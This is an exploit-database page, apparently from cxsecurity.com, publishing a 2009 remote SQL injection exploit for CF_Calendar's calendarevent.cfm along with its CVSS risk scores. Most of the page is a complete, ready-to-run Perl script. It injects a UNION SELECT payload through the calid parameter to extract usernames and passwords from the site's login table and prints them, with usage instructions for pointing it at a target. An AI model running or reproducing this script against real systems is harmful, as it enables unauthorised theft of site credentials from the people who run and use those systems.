CF_Calendar (calendarevent.cfm) Remote SQL Injection Exploit

2009-03-02 / 2009-03-03
Credit: AlpHaNiX
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl use HTTP::Request; use LWP::UserAgent; print "\n ********************************************\n"; print " * CF_Calendar Remote SQL Injection Exploit *\n"; print " * By AlpHaNiX *\n"; print " ********************************************\n"; print " ********************************************\n"; print " * usage : perl exploit.pl target *\n"; print " * contact : AlpHa[AT]HACKER[DOT]BZ *\n"; print " ********************************************\n"; $alpha1 = "calendarevent.cfm?calid="; $alpha2 = "0+union+select+1,concat(0x20616c7068616e69787761736865726520,username,0x20616e642070617373776f7264206973203a20,password,0x20616c7068616e69787761736865726520),3,4,null,6,7,8,9+from+login"; if ($ARGV[0] =~ /http:\/\// ) { $target = $ARGV[0]."/"; } else { $target = "http://".$ARGV[0]."/"; } print " Working on it\n\n"; my $alpha3 = $target.$alpha1.$alpha2; my $request = HTTP::Request->new(GET=>$alpha3); my $useragent = LWP::UserAgent->new(); $useragent->timeout(10); my $response = $useragent->request($request); if ($response->is_success) { my $res = $response->content; if ($res =~ m/ alphanixwashere (.*)and password is : (.*) alphanixwashere /g) { my ($username,$passwd) = ($1,$2); print "Username : $username \n\n password : $passwd \n\n" } else { print " operation failed \n\n"; } } else { print " Error, ".$response->status_line."\n\n"; }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top